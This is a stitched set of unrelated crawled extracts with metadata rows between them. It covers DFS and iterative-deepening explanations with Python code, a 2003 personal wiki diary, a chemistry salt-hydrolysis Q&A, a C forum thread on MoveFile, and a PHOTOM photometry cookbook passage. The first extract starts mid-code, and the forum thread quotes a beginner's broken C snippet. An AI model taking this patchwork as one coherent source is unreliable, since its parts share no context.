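# order visits 1, 2, ..., 100 and only then node 0; meanwhile the stack
# accumulates one pending copy of node 0 per expanded vertex
```

Node 0 is still visited exactly once; the duplicates cost only space, not correctness.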
Here is one idea. When you want to follow an edge to a node that already has an entry on the stack, check the old stack entry, remove (or invalidate) it, and then push the new one. This makes sure that vertices which enter and leave the stack are never pushed onto the stack again, and it keeps the stack at no more than |V| entries. I can't think of a counterexample where this modified algorithm would not visit nodes in proper DFS order, but I also don't have a proof that it always does.

For general remarks I can only guess here, since I can't read the minds of others. When you ask on Stack Overflow, you'll usually get practice-driven trade-offs: use what's faster in your setting. Saying "usually", keep in mind that the Θ(|E|) bound is a worst-case consideration; depending on the graphs you're looking at, the actual behaviour may be very different. The duplicate-pushing variant has a trivially simple inner loop and does constant work per edge, so in practice it is often the faster choice, unless you're very concerned about memory consumption, which, depending on your inputs, you may have to be.
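The invalidate-and-repush idea can be sketched with lazy deletion via tokens; this is an illustrative variant of my own, not a standard named algorithm. Each vertex keeps at most one live entry, so live entries never exceed |V|:

```python
import itertools

def dfs_invalidating(graph, start):
    """DFS where pushing a vertex invalidates any older stack entry for it
    (lazy deletion via tokens), so each vertex has at most one live entry
    and the number of live entries never exceeds |V|."""
    counter = itertools.count()
    latest = {}                      # vertex -> token of its live entry
    visited, order, stack = set(), [], []

    def push(v):
        latest[v] = next(counter)    # lazily invalidates any older entry
        stack.append((v, latest[v]))

    push(start)
    while stack:
        v, t = stack.pop()
        if v in visited or latest.get(v) != t:
            continue                 # already done, or a stale entry
        visited.add(v)
        order.append(v)
        for w in graph[v]:
            if w not in visited:
                push(w)
    return order

# here 2 is expanded before 1 and re-pushes 1, invalidating 1's older entry
order = dfs_invalidating({0: [1, 2], 1: [], 2: [1]}, 0)
```

The Python list still holds stale tuples until they are popped; an eager version would need a linked stack with per-vertex handles to bound the physical memory as well.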
The question also touches on iterative deepening, which is worth separating from plain DFS. Iterative deepening depth-first search (IDDFS) is a hybrid algorithm emerging out of BFS and DFS, a state-space search strategy that combines the goodness of both: we run a depth-limited search (DLS) for an increasing depth limit until a goal is found. Iterative deepening is a very simple, very good, but counter-intuitive idea that was not discovered until the mid-1970s.

- Completeness: plain DFS fails in infinite-depth spaces or spaces with loops, and is complete only if the state space is finite; IDDFS is complete whenever the branching factor is finite.
- Optimality: IDDFS finds a shallowest goal first, like breadth-first search, but uses much less memory. Iterative lengthening, the analogous idea with a path-cost boundary instead of depth limits, incurs substantial overhead that makes it less useful than iterative deepening.
- Time complexity: O(b^d), where b is the branching factor and d is the depth of the shallowest goal. Revisiting the upper levels in every iteration seems wasteful, but turns out not to be so costly: in a tree, most of the nodes are in the bottom level, so it does not matter much if the upper levels are visited multiple times.
- Space complexity: O(bd) with an explicit frontier of unexplored siblings, or O(d) in the purely recursive form; linear space, like DFS. This is why IDDFS is generally preferred for large state spaces where the solution depth is unknown.

Two further advantages: because early iterations use small depth limits, they execute extremely quickly and supply early indications of the result almost immediately; and in game-tree searching, the earlier shallow searches improve commonly used heuristics such as the killer heuristic and alpha-beta pruning (which is most efficient if it searches the best moves first), so the final deep search completes more quickly because it is done in a better order. In a bidirectional variant the deepening runs from both source and target; some care is needed with the meeting test, because the two search frontiers can pass through each other, in which case a shortest path consisting of an odd number of arcs will not be detected and a suboptimal path with an even number of arcs is returned instead.
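A minimal sketch of depth-limited search plus the deepening loop over an adjacency dict (graph shape and names are illustrative; the depth limit itself guarantees termination even on graphs with cycles, although cycles inflate the repeated work):

```python
def dls(graph, node, goal, limit, path):
    """Depth-limited DFS: return a path to goal within 'limit' edges, else None."""
    if node == goal:
        return path
    if limit == 0:
        return None
    for child in graph.get(node, []):
        found = dls(graph, child, goal, limit - 1, path + [child])
        if found is not None:
            return found
    return None

def iddfs(graph, start, goal, max_depth=50):
    """Iterative deepening: repeat DLS with limits 0, 1, 2, ...; space stays
    linear in the current limit, and the first hit is a shallowest goal."""
    for limit in range(max_depth + 1):
        found = dls(graph, start, goal, limit, [start])
        if found is not None:
            return found
    return None

tree = {'A': ['B', 'C'], 'B': ['D'], 'C': ['E'], 'E': ['F']}
path = iddfs(tree, 'A', 'F')
```

Each iteration redoes the shallow levels, but because the bottom level dominates the node count, the total work stays O(b^d).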
https://alexschroeder.ch/wiki?action=collect;match=%5E2003-06 | # 2003-06-01 Cooking
Hummus: canned chickpeas, olive oil, lemon juice, ground cumin, sesame paste (typically Arabic), garlic, pepper, and optionally hot paprika for garnish. Purée everything and eat with bread.
Tags:
# 2003-06-03
I just fixed several links on MeatBall:SocialSoftware. See the [History]. It was a real illustration of why MeatBall:AccidentalLinking doesn't work. The differences in capitalization, plurals, and word compositions (e.g. BulletinBoard vs. BulletinBoardSystem) make it impossible.
# 2003-06-04
I am starting a new wiki with two friends; one of them owns the account, but I have the technical know-how. This is why I'm starting to add more features to Oddmuse: CSS can be defined on a page, the referrer filter can be defined on a page, and yesterday I added that config options can be specified on a page (it is just eval'ed as Perl code). These changes are necessary because it is easier for my friend to give me the admin password for the wiki than the password for his account (where he runs several other sites, and keeps his mail).
Tags:
# 2003-06-11 Weather
The weather is hot. Can’t go out and sunbathe by the lake of Zürich before 16:00. I took the day off today because I knew it was going to be hot. Bought lots of healthy food today: lettuce, Parmesan (for the lettuce salad), tomatoes, raw beetroot (must try that with salad sometime), yaki nori (for sushi), canned chickpeas (for hummus), ginger, etc. Food shopping is awesome. Later I met Claudia by the lake, and much later we met my stepmom in the Platzspitz park and ate some vegetarian sushi I had brought along. What a nice evening!
Tags:
# 2003-06-12 Weather Pictures
The weather is hot. We have the nicest sunsets.
Tags:
# 2003-06-13
The weather is hot, but it must have rained over night. I went to Aikido because I don't work on Fridays. Claudia will come over in a minute and we'll probably go shopping. I promised her that we'll go shopping together and buy some new shoes for me. She loves it, I hate it.
The weather was nice, and we didn't have the heart to go shopping. So we drank coffee and fizzy water and ate some ice cream at the Cristallo and spent an hour at the lake.
From 19:00 to 22:00 Claudia was teaching her Oriental Pop Dance class at the oriental dance school when a shoot-out started in a street close by. So she and her students spent 20 minutes in a dark room lying on the floor, calling the police via their mobile phones and waiting for it to end.
Later that night we walked the Langstrasse, went to Letten by the Limmat (a river), met some friends by chance in McDonalds... It was 2:30 when we came back, I think.
# 2003-06-14
Hot. Breakfast at Café Blunt where they have oriental style sofas, shisha to smoke (we don't do that, but they have it), and there we ate a big breakfast with croissant, toast, Zopf, wholegrain bread, elderberry jam, butter, honey, feta, olives, cucumber and tomato with lemon juice, hummus, café macchiato, orange juice, mint tea with real mint leaves, yoghurt with fruit, and some dried dates, apples and apricots. Nice.
Claudia went to work at the bazaar of her oriental dance school around noon, while I worked on OddMuse... And now I'm testing some of that stuff here -- eg. the links to "today" and "yesterday" in the sidebar, and the random page link. Wrote some docs for OddMuse, too, and started to rework the MeatBall:WikiLog page.
We went to the lake, bought some food on the way, ate it, and 30 min later we were in a full-blown hailstorm, crushed ice whipping the streets, the sidewalks white with ice and water as if winter had just ended. We waited in a shop entrance, jumped over the flooded road and took the tram home.
Later I watched the Brazilian movie Cidade de Deus, IMDB:0317248. Interesting movie, fast paced, flashbacks, shootouts, ... The funny thing is how hard the Brazilian dialect is to understand...
# 2003-06-15
Incorporated Pierre Gaston's patch for a MeatBall:EasySubmission implementation into OddMuse [1] and mentioned it on Meatball [2].
It is now 2:53 -- I should sleep. Interesting. The new automatic links on the right made me put my late night hacking onto the early morning next day... Which is technically correct, but weird.
[Time passes]
Found another bug! The pinging of weblogs.com doesn't work as expected. I am a lazy bastard, that's why OddMuse just uses a GET call to the Ping Site Form [3]. And in order to give users the illusion that it is fast when in fact it is slow, I redirected visitors after an edit and then I called the form... But perhaps the webserver is killing OddMuse while it does the ping once the user has in fact been redirected. Argh!
[Time passes]
Well, it turns out that weblogs.com doesn't seem to like my URLs -- at least when I submit this page via the form, it complains.
[Sleep]
Spent quite some time fixing OddMuse bugs. Sadly, the commenting code had subtle bugs -- it would add the default message if somebody just hit "Save", it would delete all comments if an empty comment was saved, it added a horizontal line even when adding the first comment, etc. But I think I got them all. I was too lazy to write unit tests for this, and I think I'm going to regret this someday.
Spent the afternoon walking through town with Claudia, drinking café macchiato and eating ice cream at the Cristallo.
Zoran, my Croatian movie-making friend invited me over for a new screening of his recent movie with a new soundtrack as well as for a showing of one of his top 5 movies from ex-Jugoslavia (can't remember whether it was Croatian or not). Sadly I had to wait for Claudia, and she was out training for her tribal (oriental) dancing.
OddMuse could qualify as a MeatBall:WikiLog no? – Pierre 2003-06-15 9:43 UTC
Indeed! Thanks to you. – Alex.
Yes, I found some bugs, should be better now. – Alex
# 2003-06-16
Went to see Hero tonight, IMDB:0299977. Nice colors, and I like Tony Leung Chiu Wai and Maggie Cheung (they played in lots of Wong Kar Wai movies!). But the plot is simple -- a legend is being retold. The color coded scenes reminded me of Ran by Kurosawa, and lies as a story element reminded me of Rashomon by Kurosawa. The fighting and music was very much Crouching Tiger Hidden Dragon. So it steals from some interesting movies, but it didn't grow beyond them.
Working on the path_info stuff for OddMuse; remember, the real goal is to get notification of some MeatBall:WebLogTracker working. I currently gave up on weblogs.com and am trying my luck on blogrolling.com. Doesn't want to work, though.
# 2003-06-21 Kochen
Stangensellerie und Zwiebeln im Olivenöl dünsten, Polenta hinzugeben, 20min zugedeckt kochen, Salz, Pfeffer, Rosmarin, rühren, Feta drauf legen, 10min weiter zugedeckt kochen.
Tags:
# 2003-06-21 Music
DaveSifry has a news article for 2001-02-10 on his homepage, announcing the release of an MP3 he commissioned (together with his wife, I assume) for his daughter (I assume). The music is by PaulCuneo. Interesting way to sell music.
Tags:
# 2003-06-21 Pictures
Spent the afternoon walking through Zürich with Claudia.
Sunset.
Schanzengraben. This is a sidearm of the Sihl and used to be the moat outside the city fortifications. A corner or two of the old fortifications still exist, but I didn’t take any pictures.
Lindenhof, in Zürich. People play Bocha, chess, and tourists take pictures of the Limmat flowing by. Very nice. When we got there today (2003-06-21), she was dog tired.
Old man standing…
The old town has some really small alleys.
These flowers grow all over town in the little square pieces of open earth around trees. Very beautiful. But I think nobody planted them there. They just grow.
I also had the fire brigade entering the neighbouring building – but it was a false alarm. I suspect an unsuspecting neighbour called them when he saw all the smoke from one of the windows where the Sikhs (at least they look like Sikhs to me) light their incense. Calling them for no reason costs CHF 1500. Ouch!
Tags:
# 2003-06-22
I read the ElectronicIntifada (ei) and several other sources on a regular basis; usually that means ticking the mails for later reading.
Today was my electronic Intifada day. See 2003-03-19 Israel.
In a general context, I still admire Belgium for its law allowing prosecution of war crimes from all over the world, even though it seems to have been severely weakened these last months. Via the electronic Intifada, I’ve come upon an article by Laurie King-Irani, ei: The Sabra and Shatila Case in Belgium: A Guide for the Perplexed [1].
Oh and my shirt still hasn’t surfaced in the Riff-Raff cinema. Argh! The people are getting friendlier, at least.
Four of us on a little boat on the lake of Zürich, later dozing and chatting on the grass in the shade of huge trees near the Rentenanstalt in a crowd of people worthy of Gran Canaria, and finally a highschool reunion in a Mongolian restaurant in Mägenwil (about 1h from Zürich by public transport) – the Swiss pampa!
# 2003-06-23
Back to work. When you have four days of no work in a row, the fourth feels like real holidays. And the Monday after feels like the Mother Of All Mondays.
On #joiito, we've seen some poetry by Kevin Marks [1], so I contributed one, too:
sweat in summer
you pour cold water
Reminds me of Haiku writing on #emacs with John Wiegley [2].
And here's to silly [3]:
Str: 9
Int: 15
Wis: 17
Dex: 11
Con: 11
Chr: 12
# 2003-06-23 Pictures
I decided that I wanted pictures on the diary entries, if possible. And I decided that I was going to try and take at least a picture a day. You know, get some practice for the eye.
Went to the Zeughausareal; behind it is the Kasernenwiese and these days when the days are long and sunny, Tamils play volleyball and soccer, here (ForeignersInSwitzerland). I went with Claudia to eat some Sushi and watch them play. Claudia was tired, but we had fun.
Played a bit with the camera, by first setting the white point using a green shopping bag.
Walked home as it got darker…
I had to look at some new white trousers and help decide which ones look best.
As you can see, I started messing with the Gimp [1].
Tags:
# 2003-06-24
From Philip Greenspun's Weblog [1] comes a link to Orion magazine (never heard of it) talking about the Public Trust Doctrine. The article starts with the story of a huge ditch that diverts water for commercial purposes. This is not allowed according to the public trust doctrine:
The court ordered the cancellation of all permits the commission had issued to developers for water withdrawals, citing a little-known legal principle called the Public Trust Doctrine, which says that common resources such as water are to be held in trust by the state for the use and enjoyment of the general public, rather than private interests. [2]
It seems that this doctrine is really old and dates back to roman times:
It was codified back in 528 AD, when the Roman Emperor Justinian decided to gather and condense all the unpublished rules and edicts handed down by his predecessors into a unified, coherent code of imperial law. To the task he appointed a commission of ten legal experts, who delivered the Codex Justinianus in 529 and a year later its attendant textbook, known as the Institutes of Justinian, to which the emperor added a few words of his own. Among them were the following: "By the law of nature these things are common to all mankind, the air, running water, the sea and consequently the shores of the sea."
I wonder what this WeblogRoadmap is supposed to be.
Working, then relaxing and sleeping the Alte Bäckeranlage. And tonight: Salsa in Le Bal.
I took some pictures, but have to upload them first. This is taking time… Grrr.
# 2003-06-24 Pictures
I probably told you already that I like construction sites. And nightlife. I hate using the flash. Only Claudia’s face above was manipulated using the Gimp. I like special light conditions such as sunlight shining through leaves or shadows hanging over the streets.
Also note how I wrote a little markup extension for this particular OddMuse configuration to have floating pictures on the left and on the right. Neato!
Tags:
# 2003-06-25
The following book was recommended to me during a conversation about Jews, Israel, Palestine, the Second World War, concentration camps, etc.: Anmerkungen zu Hitler by Sebastian Haffner, ISBN 3596234891. The subject is on my mind again at the moment because I watched Band of Brothers (IMDB:0185906, ASIN:B00008OP0H) on DVD, where a concentration camp is discovered in one episode, and because of Phil Greenspun’s article on the developments from an Israeli point of view (2003-06-19 Israel). The recommended book apparently tries, in about 150 pages, to trace Hitler’s decisions back to his personality and his opinions.
Which reminds me that I have to watch Black Hawk Down (ASIN:B0000633M0, IMDB:0265086) again. Buy the DVD version – with the making-of? Or even the deluxe edition? Or rather the book? And there is a book of Band of Brothers, too…
The story of Black Hawk Down did appear as a book, but the book is a reworking of the newspaper series, which is available online:
# 2003-06-26
General assembly of our Wilhelm Tux association [1].
# 2003-06-26 Pictures
And pictures:
I still need to practice my Gimp-Fu to be able to improve those pictures. I was unable to get rid of the yellow hue on these pictures.
Tags:
# 2003-06-27
Yikes! Claudia’s parents are afraid of terrorists in Morocco, my father is afraid of the sailing conditions on the Atlantic… Not the kind of thing you want to hear a few days before departure.
We’re going to fly to Lisbon, take the bus down to the Algarve and stay for a few nights. We don’t know where, yet, but I think it is going to be Lagos; we’re going to take a room with some private person, that worked fine last time we went there… Uh, must have been 8 or 9 years ago… :/
Anyway, on July 7, we’re going to meet Joel, my friend from Aikido, and Bernhard Schluender, the skipper, and take off for Morocco. We’ll pull in at Tanger and Ceuta, and do day-trips to some towns in the north, eg. Tetouan and Chefchauen. It seems that the touristic areas are further south (Fez, Marakesch, Rabat, Meknes). I should take some time to read about Morocco before we leave on Tuesday. Yikes!
I wonder whether putting pictures online is worth my time… What do you think?
After getting up, we made our way to the Gloria and brunched.
Claudia…
Taking pictures of bypassers…
Spectacular contrast of shark fin and beer belly.
# 2003-06-28
Added an excerpt from the Press Release, IFRC, 26 June 2003 [1] to IsraelAndPalestine (that page no longer exists, and the excerpt got moved to 2003-06-28 Israel).
While walking home, I found out that it is Christopher Street Day… I love walking through the crowd; two years ago I did this with a friend of mine and we imagined ourselves to be social vampires, living off the Lebensfreude (joy-of-life) of others.
Damn, I wanted to see Tan De Repente, IMDB:0324158, but I just found out that there is no way I can find the time tomorrow or on Monday before leaving on Tuesday. ggnnn!
At least I’ll see Russian Ark, IMDB:0318034, with Claudia’s brother and his wife tomorrow night.
And tonight I went to see Nueve Reinas, IMDB:0247586.
# 2003-06-28 Israel
Here is from Press Release, IFRC, 26 June, 2003 [1]:
One thousand days of violence have killed just over 3,000 people (2,398 Palestinians and 704 Israelis) and left 28,000 injured (23,150 Palestinians and 4,849 Israelis) in Israel and the Palestinian Autonomous and Occupied Territories. This is the human toll since the second Intifada started on September 29, 2000, according to figures from the Palestine Red Crescent (PRCS) and Magen David Adom (MDA), Israel’s equivalent of a Red Cross or Red Crescent Society. […]
As reported by the ElectronicIntifada [2], the violence in Israel follows a regular pattern. This was written June 13, 2003.
One week after the Aqaba summit, the Israeli-Palestinian death toll climbed to 30 with no sign of the violence slowing. Many US commentators blamed the carnage on the Palestinian attacks of June 8, which killed five Israeli occupation soldiers.
In fact, there has not been a single day since the Sharm el-Sheikh and Aqaba summits that the Israeli Army stopped its attacks on Palestinians. For three days before and during the summits Israel attacked the Nablus and Balata refugee camps, wounding dozens of civilians, many of them children. The day after Aqaba, an Israeli death squad assassinated two Hamas activists in Tulkarm, and every day since, the occupying forces have been destroying Palestinian homes – all this before the attacks on Israeli soldiers.
The sad thing comes later in the article, when they quote:
As Arab-American activist Hussein Ibish stated on Fox News in a debate with the Israeli consul-general in New York, “Sharon and Hamas have developed a strategic partnership against peace.”
Tags:
# 2003-06-29
I think I found a way to go and watch Tan De Repente (IMDB:0324158) anyway. Tomorrow I'll go to the interview with the journalist from Sonntagsblick at 14:00, and I'll meet a friend who is visiting from the US at 17:00 by the lake – so I can go to the movies at 14:45 and still make it.
I also haven't packed, yet.
Watched Russian Ark (IMDB:0318034) tonight; and the comments on IMDB are about right: While the idea of using one 90 min shot for the entire movie is very interesting and does give the film a new quality, there is little story and entertainment. I liked it at the beginning and the rest, when the camera moves between people and costumes and story fragments – and there are many beautiful women in beautiful costumes! – I liked the subtle Europe vs. Russia conflict underlying some of the scenes, and the "ending" of Europe as the dance ends (fantastic pictures, there)… But this conflict idea was also mentioned in very direct terms in one of the weaker parts of the movie, so that kind of spoiled it. Since I am a very visual person when it comes to movies, I still liked it; beautiful people, the look of intrigue, the dance of the camera and the people, it sort of made up for the plot problem.
We went brunching at the Irchel Park today. Now you need to know that within this particular circle of friends, we have two knights, Sir Glod and Sir Evelus, while the rest of us are just part of the entourage. And Sir Glod and Sir Evelus even have their own castle. And today was the day to build it:
# 2003-06-30
1:24 in the morning. I should pack. Pack! Instead, I implemented RSS 3.0 for Oddmuse... (WeblogRoadmap) I'll never learn.
Via Bruce Sterling's ViridianDesign list, I found a page talking about beautiful faces: What makes a face beautiful? [1]
I went to see Tan De Repente (IMDB:0324158) after a short interview with a journalist from the Sonntagsblick (together with Daniel Boos of trash.net). A hot and sunny day, and I was in a tiny cinema with two big fans blowing down some air, watching this black and white Argentinian movie about girls -- shy and fat, skinny and demanding, tough, old, artistic girls... and an innocent, irrelevant man. I liked it very much.
I saw two friends today who have been living in Los Alamos these last months... [2] We once lived in a Wohngemeinschaft (shared flat); it is one of the beautiful things in life that some friendships last for years even though you don't have to keep in touch.
I packed. We are ready to go! | 2015-04-27 13:41:18 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2154448926448822, "perplexity": 8256.041884600894}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-18/segments/1429246658376.88/warc/CC-MAIN-20150417045738-00078-ip-10-235-10-82.ec2.internal.warc.gz"} |
https://www.vedantu.com/question-answer/which-of-the-following-is-a-basic-salt-a-sncl2-b-class-12-chemistry-cbse-5f5c42018f2fe24918043216 | Question
# Which of the following is a basic salt? (A) $SnC{l_2}$ (B) $NaCl$ (C) $N{H_4}Cl$ (D) $C{H_3}COONa$
Hint: Any salt that hydrolyses to form a basic solution is a basic salt. The chloride ion is the conjugate base of a strong acid (HCl), so it is far too weak a base to be hydrolysed in water.
Hence salts containing chloride ions ($C{l^ - }$) cannot be basic salts, and so $SnC{l_2}$, NaCl and $N{H_4}Cl$ are not basic salts. (In fact $N{H_4}Cl$ gives an acidic solution, because the $N{H_4}^ + $ ion does hydrolyse.)
Sodium acetate ($C{H_3}COONa$) is the sodium salt of acetic acid ($C{H_3}COOH$), which is a weak acid, so the acetate ion hydrolyses to give a basic solution. A solution of acetic acid and sodium acetate also acts as a buffer and keeps the pH nearly constant. (Vinegar, by contrast, is simply a dilute solution of acetic acid.)
So, sodium acetate ($C{H_3}COONa$) is a basic salt. | 2021-11-29 23:20:20 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8513050675392151, "perplexity": 4235.853896670397}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964358847.80/warc/CC-MAIN-20211129225145-20211130015145-00432.warc.gz"} |
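The standard hydrolysis equilibria behind this answer (textbook relations, not quoted from the original page) can be written as:

```latex
% acetate is the conjugate base of the weak acid CH3COOH,
% so it hydrolyses and releases OH-:
\[ C{H_3}CO{O^ - } + {H_2}O \rightleftharpoons C{H_3}COOH + O{H^ - } \]
% chloride is the conjugate base of the strong acid HCl,
% so it does not hydrolyse to any appreciable extent:
\[ C{l^ - } + {H_2}O \longrightarrow \text{no reaction} \]
```

The excess $O{H^ - }$ from the first equilibrium is what makes the sodium acetate solution basic.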
http://cboard.cprogramming.com/c-programming/105157-simple-code-question.html | # simple code question
1. ## simple code question
I need to write a program to move files from one folder to another. How do I "cut and paste" in C?
2. This sounds like a job for the OS. If you have to do it in C, have the OS do it with system() calls.
If you're bored, you can always read in a file, and write it out again somewhere else.
3. Or, if it's for Windows only, use MoveFile.
--
Mats
4. can someone give me a quick sample code that uses movefile, I'm not sure on the syntax
5. ... MoveFile("C:\\from\\here.txt", "C:\\to\\here.txt");
Seriously, doesn't get much easier
6. thanx a bunch
7. should the code look like this
Code:
void main()
{
BOOL movefile("C:\\stuff","C:\\stuff2");
}
sry im a real noob
8. it should be | 2015-05-07 00:20:37 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.24825146794319153, "perplexity": 1493.651987596625}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-18/segments/1430459917448.46/warc/CC-MAIN-20150501055837-00002-ip-10-235-10-82.ec2.internal.warc.gz"} |
http://star-www.rl.ac.uk/star/docs/sc6.htx/sc6se14.html | ### 14 Measuring Instrumental Magnitudes with PHOTOM
This recipe shows how to use PHOTOM (see SUN/45[22]) to measure instrumental magnitudes for objects in a CCD frame. The objects may be either standard stars or programme objects. The techniques for measuring instrumental magnitudes are discussed in Section 10.
The starting point is a CCD frame which has been processed to remove instrumental effects. This process typically includes: removing cosmic-ray events and other blemishes, de-biasing and flat-fielding. It is described in SC/5: The 2-D CCD Data Reduction Cookbook[18] and in SUN/139[19], the manual for the CCDPACK package, and is not considered further here. SC/5 is a good introduction. PHOTOM can be used interactively, or can be supplied with a list of coordinates of stars on which it will perform aperture photometry. It is used interactively in this recipe.
The example CCD frame used in this recipe is available as file:
/star/examples/sc6/ccdframe.sdf
If you intend to work through the recipe using this file you should make a copy of it in your current directory. Alternatively, you may prefer to use a CCD frame of your own.
(1)
First the image containing the stars must be displayed using software which PHOTOM can interact with. Application display in KAPPA (see SUN/95[11]) is ideal. It is best to create the display window using the xmake utility because in this way you can define the display to have an overlay plane, thus allowing the graphics output by PHOTOM to be cleared without destroying the displayed image. So, start the display with a command like:
% xmake xwindows -overlay -ovcolour blue
(2)
Now display the data with KAPPA display using xwindows as the display device. Briefly, type:
% kappa
to load the KAPPA package. Then issue the following commands:
% lutneg
DEVICE - Name of display device > xwindows
% display
IN - NDF to be displayed > ccdframe
DEVICE - Name of display device > xwindows
MODE - Method to define the scaling limits /’SCALE’/ > FAINT
Data will be scaled from 200 to 2666.
lutneg sets up a negative grey-scale colour table. display displays the image, which should appear as a grey-scale plot. Note that the input file name is (and must be) specified without the ‘.sdf’ file type.
(3)
Next, start up PHOTOM by typing photomstart to enable its commands and photom to start. You will be asked for the name of a data frame. Again the file name must be specified without the file type. The default name for the output file written by PHOTOM is photom.dat. If this file exists, an error message will appear and you will be prompted for an alternate name. The sequence of commands and responses should be something like the following:
% photomstart
PHOTOM applications are now available -- (Version 1.5-0)
% photom
IN - NDF containing input image > ccdframe
Commands are - Annulus, Centroid, End, File, Help, Ishape, Measure,
Nshape, Options, Photons, Sky, Values
COMMAND - PHOTOM /’Values’/ >
(4)
If you hit <RETURN> here you will get a list of the default values that are set for PHOTOM at present. The result will be like:
COMMAND - PHOTOM /’Values’/ >
Semim = 5.0
Eccen = 0.00
Angle = 0.0
Centroiding of star in aperture
Concentric sky aperture
Sky estimator = Mode
Sky magnitude = 50.0
Exposure time = 1.00
Saturation level ( data units ) = 0.17000E+39
Errors from sky variance
COMMAND - PHOTOM /’Values’/ >
You can use Help to find out what the options are:
COMMAND - PHOTOM /’Values’/ > help
Commands are - Annulus, Centroid, End, File, Help, Ishape, Measure,
Nshape, Options, Photons, Sky, Values
Annulus - Toggle between sky measured in concentric annulus or in selected area
Centroid - Toggle between measuring around centroid of image or given position
End - Exit program
File - Supply a file of object positions
Help - This help message
Ishape - Select aperture shape interactively
Measure - Make measurements interactively
Nshape - Select aperture shape non-interactively
Options - Change values of some parameters
Photons - Select error estimate - photon statistics, sky or data variance
Sky - Select sky estimator - mean, mean within 2 sigma, mode or user given
Values - Output current parameter values
COMMAND - PHOTOM /’Values’/ >
Some of these choices toggle between values. The way these options work is that when the appropriate command is issued the chosen option is switched from whatever its current state happens to be to its other state. A message is issued indicating the new state. Centroiding, for instance, can be switched on or off. Generally for interactive work it is best to leave centroiding switched on.
(5)
The next step is to set some parameters which define the apertures which will be used and various related items. Initially a circular aperture will be used, with the sky background measured in an annulus around it. You should toggle the Annulus command until a concentric aperture is selected.
Now you will need to choose some suitable values for the measuring aperture radii. The background annulus measuring region should be set so that its inner radius is a little outside the central circle, so that it is not unduly contaminated with stray light and its outer radius should not be so big that it includes too many surrounding objects.
How big does the radius of the measuring aperture need to be, and how much bigger should the background annulus around it be? There is no hard and fast answer: it depends on the plate scale of the image, how crowded the field is and whether the programme objects are stars or extended objects. If the aperture is too small then a fraction of the light from the object being measured will fall outside the aperture and not be detected, thus leading to an underestimate of the brightness of the object.
If your programme objects are stars and all your CCD frames have the same point-spread function (that is, the seeing remained the same whilst all the frames were acquired) then the choice of aperture is not too critical. All the objects measured, both programme stars and standard stars, have the same profile and hence they all lose the same fraction of their light. This systematic underestimation of the brightness is simply calibrated out when the instrumental magnitudes are converted to magnitudes in a standard system. In this case quite a small aperture can be used in order to minimise statistical errors in the background and contamination by faint stars.
The situation is rather different if the programme objects are extended objects. Here the programme objects will have a different intensity profile to the standard stars and hence for a given aperture size a different fraction of the total light will be lost. Thus it is important to determine the total magnitudes for both standard stars and programme objects and a larger aperture is appropriate.
An aperture radius of about twenty seconds of arc is often a reasonable starting point.
The background can be sampled using various algorithms. A simple mean will obviously be sensitive to any contaminating source, such as faint stars, within the annulus, but a mode will tend to be less affected by aberrant, outlying values.
(6)
Next set the size of the measurement aperture:
COMMAND - PHOTOM /’Values’/ > n
SEMIM - Semi-major axis /5/ > 8
ECCEN - Eccentricity /0/ >
ANGLE - Orientation /0/ >
COMMAND - PHOTOM /’Values’/ >
Notice a couple of things here:
• you only need to use the initial letter of your choice,
• an arbitrary elliptical aperture can be chosen. This option is suitable for measuring elliptical galaxies.
Now set the other required values:
COMMAND - PHOTOM /’Values’/ > o
INNER - Inner annular radius /1.4/ > 1.3
OUTER - Outer annular radius /2/ > 2.1
SKYMAG - Magnitude of sky /50/ > 30
BIASLE - Bias level ( data units ) /0/ >
SATURE - Saturation level ( data units ) /1.7E38/ >
COMMAND - PHOTOM /’Values’/ >
A few more things to note:
• the annulus measurements are entered as multiples of the measurement aperture,
